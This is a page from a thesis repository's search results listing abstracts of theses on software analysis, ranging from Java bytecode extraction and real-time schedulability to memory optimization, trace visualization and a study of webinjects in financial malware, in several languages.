Spelling suggestions: "subject:"5oftware 2analysis"" "subject:"5oftware 3analysis""
11 |
Μελέτη παραμορφώσεων που προκαλούνται από τις απαιτήσεις σε υπολογιστική ισχύ σε λογισμικά ήχουΜαλανδράκης, Στέφανος 31 May 2012 (has links)
Στην παρούσα εργασία γίνεται μελέτη ορισμένων χαρακτηριστικών παραμέτρων που αποδίδουν ένα ενδεικτικό μέτρο παραμορφώσεων για ηχητικά σήματα. Τα σήματα αυτά είναι παράγωγα διαφόρων λογισμικών ήχου που λειτουργούν σε μεταβλητές καταστάσεις υπολογιστικού φόρτου, με αποτέλεσμα να μελετάται εάν και πώς επηρρεάζονται τα ηχητικά σήματα από τους παράγοντες αυτούς. Γίνεται προσπάθεια να οριστεί κατάλληλος τρόπος αξιολόγησης των λογισμικών ήχου για την περαιτέρω διερεύνηση της υποκειμενικής ηχητικής ποιότητας από κάποια υπολογιστικά συστήματα. / --
|
12 |
Development of a Java Bytecode Front-EndModesto, Francisco January 2009 (has links)
The VizzAnalyzer is a powerful software analysis tool. It is able to extract information from various software representations like source code but also other specifications like UML. The extracted information is input to static analysis of these software projects. One programming language the VizzAnalyzer can extract information from is Java source code. Analyzing the source code is sufficient for most of the analysis. But, sometimes it is necessary to analyze compiled classes either because the program is only available in byte-code, or the scope of analysis includes libraries that exist usually in binary form. Thus, being able to extract information from Java byte-code is paramount for the extension of some analyses, e.g., studying the dependecy structure of a project and the libraries it uses. Currently, the VizzAnalyzer does not feature information extraction from Java byte-code. To allow, e.g., the analysis of the project dependency structure, we extend the VizzAnalyzer tool with a bytecode front-end that will allow the extraction of information from Java bytecode. This thesis describes the design and implementation of the bytecode front-end. After we implemented and integrated the new front-end with the VizzAnalyzer, we are now able to perform new analyses that work on data extracted from both, source- and bytecode.
|
13 |
An exploration into the use of webinjects by financial malwareForrester, Jock Ingram January 2014 (has links)
As the number of computing devices connected to the Internet increases and the Internet itself becomes more pervasive, so does the opportunity for criminals to use these devices in cybercrimes. Supporting the increase in cybercrime is the growth and maturity of the digital underground economy with strong links to its more visible and physical counterpart. The digital underground economy provides software and related services to equip the entrepreneurial cybercriminal with the appropriate skills and required tools. Financial malware, particularly the capability for injection of code into web browsers, has become one of the more profitable cybercrime tool sets due to its versatility and adaptability when targeting clients of institutions with an online presence, both in and outside of the financial industry. There are numerous families of financial malware available for use, with perhaps the most prevalent being Zeus and SpyEye. Criminals create (or purchase) and grow botnets of computing devices infected with financial malware that has been configured to attack clients of certain websites. In the research data set there are 483 configuration files containing approximately 40 000 webinjects that were captured from various financial malware botnets between October 2010 and June 2012. They were processed and analysed to determine the methods used by criminals to defraud either the user of the computing device, or the institution of which the user is a client. The configuration files contain the injection code that is executed in the web browser to create a surrogate interface, which is then used by the criminal to interact with the user and institution in order to commit fraud. Demographics on the captured data set are presented and case studies are documented based on the various methods used to defraud and bypass financial security controls across multiple industries. The case studies cover techniques used in social engineering, bypassing security controls and automated transfers.
|
14 |
Posouzení informačního systému firmy a návrh změn / Information System Assessment and Proposal of ICT ModificationHorný, Miloš January 2019 (has links)
This diploma project is about the assessment of the information system of the Slovak football association using appropriate methods and evaluating outputs as proposal of solution for more effective information system in organisation. Diplopma thesis values current situation of information system and sets conditions for optimised solution focused on overall improvements in effectivity and functions of information system.
|
15 |
RAUK: Automatic Schedulability Analysis of RTIC Applications Using Symbolic ExecutionHåkansson, Mark January 2022 (has links)
In this thesis, the proof-of-concept tool RAUK for automatically analyzing RTIC applications for schedulability using symbolic execution is presented. The RTIC framework provides a declarative executable model for building embedded applications, which behavior is based on established formal methods and policies. Because of this, RTIC applications are amenable for both worst-case execution time (WCET) and scheduling analysis techniques. Internally, RAUK utilizes the symbolic execution tool KLEE to generate test vectors covering all feasible execution paths in all user tasks in the RTIC application. Since KLEE also checks for possible program errors e.g. arithmetic or array indexing errors, it can be used via RAUK to verify the robustness of the application in terms of program errors. The test vectors are replayed on the target hardware to record a WCET estimation for all user tasks. These WCET measurements are used to derive a worst-case response time (WCRT) for each user task, which in turn is used to determine if the system is schedulable using formal scheduling analysis techniques. The evaluation of this tool shows a good correlation between the results from RAUK and manual measurements of the same tasks, which showcases the viability of this approach. However, the current implementation can add some substantial overhead to the measurements, and sometimes certain types of paths in the application can be completely absent from the analysis. The work in this thesis is based on previous research in this field for WCET estimation using KLEE on an older iteration of the RTIC framework. Our contributions include a focus on an RTIC 1.0 pre-release, a seamless integration with the Rust ecosystem, minimal changes required to the application itself, as well as an included automatic schedulability analyzer. Currently, RAUK can verify simple RTIC applications for both program errors and schedulability with minimal changes to the application source code. The groundwork is laid out for further improvements that are required to function on larger and more complex applications. Solutions for known problems and future work are discussed in Chapters 6, 7 respectively.
|
16 |
Software-level analysis and optimization to mitigate the cost of write operations on non-volatile memories / Analyse logicielle et optimisation pour réduire le coût des opérations d'écriture sur les mémoires non volatilesBouziane, Rabab 07 December 2018 (has links)
La consommation énergétique est devenue un défi majeur dans les domaines de l'informatique embarquée et haute performance. Différentes approches ont été étudiées pour résoudre ce problème, entre autres, la gestion du système pendant son exécution, les systèmes multicœurs hétérogènes et la gestion de la consommation au niveau des périphériques. Cette étude cible les technologies de mémoire par le biais de mémoires non volatiles (NVMs) émergentes, qui présentent intrinsèquement une consommation statique quasi nulle. Cela permet de réduire la consommation énergétique statique, qui tend à devenir dominante dans les systèmes modernes. L'utilisation des NVMs dans la hiérarchie de la mémoire se fait cependant au prix d'opérations d'écriture coûteuses en termes de latence et d'énergie. Dans un premier temps, nous proposons une approche de compilation pour atténuer l'impact des opérations d'écriture lors de l'intégration de STT-RAM dans la mémoire cache. Une optimisation qui vise à réduire le nombre d'opérations d'écritures est implémentée en utilisant LLVM afin de réduire ce qu'on appelle les silent stores, c'est-à-dire les instances d'instructions d'écriture qui écrivent dans un emplacement mémoire une valeur qui s'y trouve déjà. Dans un second temps, nous proposons une approche qui s'appuie sur l'analyse des programmes pour estimer des pire temps d'exécution partiaux, dénommés δ-WCET. À partir de l'analyse des programmes, δ-WCETs sont déterminés et utilisés pour allouer en toute sécurité des données aux bancs de mémoire NVM avec des temps de rétention des données variables. L'analyse δ-WCET calcule le WCET entre deux endroits quelconques dans un programme, comme entre deux blocs de base ou deux instructions. Ensuite, les pires durées de vie des variables peuvent être déterminées et utilisées pour décider l'affectation des variables aux bancs de mémoire les plus appropriées. / Traditional memories such as SRAM, DRAM and Flash have faced during the last years, critical challenges related to what modern computing systems required: high performance, high storage density and low power. As the number of CMOS transistors is increasing, the leakage power consumption becomes a critical issue for energy-efficient systems. SRAM and DRAM consume too much energy and have low density and Flash memories have a limited write endurance. Therefore, these technologies can no longer ensure the needs in both embedded and high-performance computing domains. The future memory systems must respect the energy and performance requirements. Since Non Volatile Memories (NVMs) appeared, many studies have shown prominent features where such technologies can be a potential replacement of the conventional memories used on-chip and off-chip. NVMs have important qualities in storage density, scalability, leakage power, access performance and write endurance. Nevertheless, there are still some critical drawbacks of these new technologies. The main drawback is the cost of write operations in terms of latency and energy consumption. We propose a compiler-level optimization that reduces the number of write operations by elimination the execution of redundant stores, called silent stores. A store is silent if it’s writing in a memory address the same value that is already stored at this address. The LLVM-based optimization eliminates the identified silent stores in a program by not executing them. Furthermore, the cost of a write operation is highly dependent on the used NVM and its non-volatility called retention time; when the retention time is high then the latency and the energetic cost of a write operation are considerably high and vice versa. Based on that, we propose an approach applicable in a multi- bank NVM where each bank is designed with a specific retention time. We analysis a program and we compute the worst-case lifetime of a store instruction to allocate data to the most appropriate NVM bank.
|
17 |
Visualization techniques for the analysis of software behavior and related structuresTrümper, Jonas January 2014 (has links)
Software maintenance encompasses any changes made to a software system after its initial deployment and is thereby one of the key phases in the typical software-engineering lifecycle. In software maintenance, we primarily need to understand structural and behavioral aspects, which are difficult to obtain, e.g., by code reading. Software analysis is therefore a vital tool for maintaining these systems: It provides - the preferably automated - means to extract and evaluate information from their artifacts such as software structure, runtime behavior, and related processes.
However, such analysis typically results in massive raw data, so that even experienced engineers face difficulties directly examining, assessing, and understanding these data. Among other things, they require tools with which to explore the data if no clear question can be formulated beforehand. For this, software analysis and visualization provide its users with powerful interactive means. These enable the automation of tasks and, particularly, the acquisition of valuable and actionable insights into the raw data. For instance, one means for exploring runtime behavior is trace visualization.
This thesis aims at extending and improving the tool set for visual software analysis by concentrating on several open challenges in the fields of dynamic and static analysis of software systems. This work develops a series of concepts and tools for the exploratory visualization of the respective data to support users in finding and retrieving information on the system artifacts concerned. This is a difficult task, due to the lack of appropriate visualization metaphors; in particular, the visualization of complex runtime behavior poses various questions and challenges of both a technical and conceptual nature.
This work focuses on a set of visualization techniques for visually representing control-flow related aspects of software traces from shared-memory software systems: A trace-visualization concept based on icicle plots aids in understanding both single-threaded as well as multi-threaded runtime behavior on the function level. The concept’s extensibility further allows the visualization and analysis of specific aspects of multi-threading such as synchronization, the correlation of such traces with data from static software analysis, and a comparison between traces. Moreover, complementary techniques for simultaneously analyzing system structures and the evolution of related attributes are proposed. These aim at facilitating long-term planning of software architecture and supporting management decisions in software projects by extensions to the circular-bundle-view technique: An extension to 3-dimensional space allows for the use of additional variables simultaneously; interaction techniques allow for the modification of structures in a visual manner.
The concepts and techniques presented here are generic and, as such, can be applied beyond software analysis for the visualization of similarly structured data. The techniques' practicability is demonstrated by several qualitative studies using subject data from industry-scale software systems. The studies provide initial evidence that the techniques' application yields useful insights into the subject data and its interrelationships in several scenarios. / Die Softwarewartung umfasst alle Änderungen an einem Softwaresystem nach dessen initialer Bereitstellung und stellt damit eine der wesentlichen Phasen im typischen Softwarelebenszyklus dar. In der Softwarewartung müssen wir insbesondere strukturelle und verhaltensbezogene Aspekte verstehen, welche z.B. alleine durch Lesen von Quelltext schwer herzuleiten sind. Die Softwareanalyse ist daher ein unverzichtbares Werkzeug zur Wartung solcher Systeme: Sie bietet - vorzugsweise automatisierte - Mittel, um Informationen über deren Artefakte, wie Softwarestruktur, Laufzeitverhalten und verwandte Prozesse, zu extrahieren und zu evaluieren.
Eine solche Analyse resultiert jedoch typischerweise in großen und größten Rohdaten, die selbst erfahrene Softwareingenieure direkt nur schwer untersuchen, bewerten und verstehen können. Unter Anderem dann, wenn vorab keine klare Frage formulierbar ist, benötigen sie Werkzeuge, um diese Daten zu erforschen. Hierfür bietet die Softwareanalyse und Visualisierung ihren Nutzern leistungsstarke, interaktive Mittel. Diese ermöglichen es Aufgaben zu automatisieren und insbesondere wertvolle und belastbare Einsichten aus den Rohdaten zu erlangen. Beispielsweise ist die Visualisierung von Software-Traces ein Mittel, um das Laufzeitverhalten eines Systems zu ergründen.
Diese Arbeit zielt darauf ab, den "Werkzeugkasten" der visuellen Softwareanalyse zu erweitern und zu verbessern, indem sie sich auf bestimmte, offene Herausforderungen in den Bereichen der dynamischen und statischen Analyse von Softwaresystemen konzentriert. Die Arbeit entwickelt eine Reihe von Konzepten und Werkzeugen für die explorative Visualisierung der entsprechenden Daten, um Nutzer darin zu unterstützen, Informationen über betroffene Systemartefakte zu lokalisieren und zu verstehen. Da es insbesondere an geeigneten Visualisierungsmetaphern mangelt, ist dies eine schwierige Aufgabe. Es bestehen, insbesondere bei komplexen Softwaresystemen, verschiedenste offene technische sowie konzeptionelle Fragestellungen und Herausforderungen.
Diese Arbeit konzentriert sich auf Techniken zur visuellen Darstellung kontrollflussbezogener Aspekte aus Software-Traces von Shared-Memory Softwaresystemen: Ein Trace-Visualisierungskonzept, basierend auf Icicle Plots, unterstützt das Verstehen von single- und multi-threaded Laufzeitverhalten auf Funktionsebene. Die Erweiterbarkeit des Konzepts ermöglicht es zudem spezifische Aspekte des Multi-Threading, wie Synchronisation, zu visualisieren und zu analysieren, derartige Traces mit Daten aus der statischen Softwareanalyse zu korrelieren sowie Traces mit einander zu vergleichen. Darüber hinaus werden komplementäre Techniken für die kombinierte Analyse von Systemstrukturen und der Evolution zugehöriger Eigenschaften vorgestellt. Diese zielen darauf ab, die Langzeitplanung von Softwarearchitekturen und Management-Entscheidungen in Softwareprojekten mittels Erweiterungen an der Circular-Bundle-View-Technik zu unterstützen: Eine Erweiterung auf den 3-dimensionalen Raum ermöglicht es zusätzliche visuelle Variablen zu nutzen; Strukturen können mithilfe von Interaktionstechniken visuell bearbeitet werden.
Die gezeigten Techniken und Konzepte sind allgemein verwendbar und lassen sich daher auch jenseits der Softwareanalyse einsetzen, um ähnlich strukturierte Daten zu visualisieren. Mehrere qualitative Studien an Softwaresystemen in industriellem Maßstab stellen die Praktikabilität der Techniken dar. Die Ergebnisse sind erste Belege dafür, dass die Anwendung der Techniken in verschiedenen Szenarien nützliche Einsichten in die untersuchten Daten und deren Zusammenhänge liefert.
|
18 |
Success factors of a winning organisation, measured at Rubico (Pty) LtdLubbe, C. R. 03 1900 (has links)
Study project (MBA)--University of Stellenbosch, 2003. / ENGLISH ABSTRACT: South Africa is a land of contrasts - contrasts in its landscape, cultures and business.
Highly successful organisations exist in South Africa. The less fortunate
organisations can learn a lot from them and other successful international
organisations. Business has become a highly sophisticated science and although a
recipe for instant success does not exist, the criteria described in this study can
enhance an organisation's chances for success considerably.
The first section of the study focuses on a literature study of nine critical factors
identified in successful organisations. The study covers: Vision, Map, Customer
Focus, Confidence, Standards, Drive, Teamwork, Support and Belonging. The
establishment and development of these critical factors within an organisation are
fundamental in highly successful organisations. The study will defines and develops
these factors into practical and understandable criteria to be used and measured in
an organisation. It further uses the criteria to show where an organisation could be
failing and highlights some common mistakes that can be avoided. The study also
provides business models to develop these criteria.
The second section of the study focuses on an internal survey done at Rubico (Pty)
Ltd, to measure the criteria explained in the first section. The survey highlights areas
where Rubico (Pty) Ltd is functioning well, but also identifies shortcomings. The
survey can be used as a measuring tool to provide insight into areas where an
organisation is lacking and give the user the ability to manage more effectively. / AFRIKAANSE OPSOMMING: Suid-Afrika is 'n land van kontraste - kontraste in die landskap, kulture en
sakewêreld. Daar bestaan baie suksesvolle organisasies in Suid-Afrika. Minder
suksesvolle organisasies kan baie leer by hierdie en ander suksesvolle
internasionale organisasies. Besigheid het verander in 'n hoogs gesofistikeerde
wetenskap en hoewel daar geen resep bestaan vir oornagsukses nie, kan die kriteria
wat beskryf word in hierdie studie 'n organisasie se kanse op sukses verbeter.
Die eerste deel van die studie fokus op 'n literatuurstudie oor nege kritiese faktore
wat in suksesvolle organisasies geïdentifiseer is. Die studie spreek die volgende aan:
visie, strategie, verbruiker fokus, vertroue, standaarde, dryfkrag, spanwerk,
ondersteuning en "belonging". Die daarstelling en ontwikkeling van hierdie faktore
binne die organisasie is fundamenteel in hoogs suksesvolle organisasies. Die studie
definiëer en ontwikkel hierdie faktore in praktiese en verstaanbare kriteria wat
gebruik en gemeet kan word binne 'n organisasie. Verder gebruik die studie hierdie
kriteria om aan te dui waar 'n organisasie nie slaag nie en om algemene foute wat
vermy kan word, uit te wys. Die studie voorsien ook sakemodelle om die kriteria te
onwikkel.
Die tweede deel van die studie fokus op 'n interne opname wat in Rubico (Pty) Ltd
geloods is, om die kriteria wat in die eerste deel verduidelik is, te meet. Die opname
beklemtoon areas waar Rubico (Pty) Ltd suksesvol is, maar identifiseer ook leemtes.
Die opname kan gebruik word as 'n meetinstrument om insig oor tekortkominge in
die organisasie te bekom en die gebruiker daarvan toe te rus vir effektiewe bestuur.
|
19 |
Návrh subsystému CRM firemního informačního systému / Design of information system CRM moduleHonajzer, Martin January 2008 (has links)
The aim of this work is to analyze and design model completely prepared for the developing team which must be able to build a fully functional CRM modul for company offering computer training. Through the use of UML diagrams it will figure out functions offered by the modul and the way, how these functions are accessible to the user. This work will also suggest some possibilities of work between this modul and the database in the SQL language.
|
20 |
Metodologia de aquisição de dados e análise por software, para sistemas de coincidências 4πβ-γ e sua aplicação na padronização de radionuclídeos, com ênfase em transições metaestáveis / Data acquisition with software analysis methodology for 4πβ-γ coincidence systems and application in radionuclide standardization, with emphasis on metastable transitionsBrancaccio, Franco 06 August 2013 (has links)
O Laboratório de Metrologia Nuclear (LMN) do Instituto de Pesquisas Energéticas e Nucleares (IPEN) desenvolveu recentemente o Sistema de Coincidência por Software (SCS), para a digitalização e registro dos sinais de seus sistemas de coincidências 4πβ-γ utilizados na padronização de radionuclídeos. O sistema SCS possui quatro entradas analógicas independentes que possibilitam o registro simultâneo dos sinais de até quatro detectores (vias β e γ). A análise dos dados é realizada a posteriori, por software, incluindo discriminação de amplitudes, simulação do tempo-morto da medida e definição do tempo de resolução de coincidências. O software então instalado junto ao SCS estabeleceu a metodologia básica de análise, aplicável a radionuclídeos com decaimento simples, como o 60Co. O presente trabalho amplia a metodologia de análise de dados obtidos com o SCS, de modo a possibilitar o uso de detectores com alta resolução em energia (HPGe), para padronização de radionuclídeos com decaimentos mais complexos, com diferentes ramos de decaimento ou com transições metaestáveis. A expansão metodológica tem suporte na elaboração do programa de análise denominado Coincidence Analyzing Task (CAT). A seção de aplicação inclui as padronizações do 152Eu (diferentes ramos de decaimento) e do 67Ga (nível metaestável). A padronização do 152Eu utilizou uma amostra de uma comparação internacional promovida pelo BIPM (Bureau International des Poids et Mesures), podendo-se comparar a atividade obtida com o valores de laboratórios mundialmente reconhecidos, de modo a avaliar e validar a metodologia desenvolvida. Para o 67Ga, foram obtidas: a meia-vida do nível metaestável de 93 keV, por três diferentes técnicas de análise do conjunto de dados (βpronto-γatrasado-HPGe, βpronto-γatrasado-NaI e βpronto- βatrasado); as atividades de cinco amostras, normalizadas por Monte Carlo e as probabilidades de emissão gama por decaimento, para nove transições. / The Nuclear Metrology Laboratory (LMN) at the Nuclear and Energy Research Institute (IPEN São Paulo, Brazil) has recently developed the Software Coincidence System (SCS), for the digitalization and recording of signals from its 4πβγ detection systems. SCS features up four independent analog inputs, enabling the simultaneous recording of up four detectors (β and γ). The analysis task is performed a posteriori, by means of specialized software, including the setting up of energy discrimination levels, dead-time and coincidence resolution time. The software initially installed was able to perform a basic analysis, for the standardization of simple decay radionuclides, such as 60Co. The present work improves the SCS analysis methodology, in order to enable the use of high resolution detectors (HPGe), for standardization of complex decay radionuclides, including metastable transitions or different decay branches. A program called Coincidence Analyzing Task (CAT) was implemented for the data processing. The work also includes an application section, where the standardization results of 152Eu (different decay branches) and 67Ga (with a metastable level) are presented. The 152Eu standardization was considered for the methodology validation, since it was accomplished by the measurement of a sample previously standardized in an international comparison sponsored by the BIPM (Bureau International des Poids et Mesures). The activity value obtained in this work, as well as its accuracy, could be compared to those obtained by important laboratories in the world. The 67Ga standardization includes the measurement of five samples, with activity values normalized by Monte Carlo simulation. The 93 keV metastable level half-life and the gamma emission probabilities per decay for nine transition of 67Ga are also presented. The metastable half-life was obtained by three different methods: βprompt-γdelayed-HPGe, βprompt-γdelayed-NaI and βprompt-βdelayed.
|
Page generated in 0.0616 seconds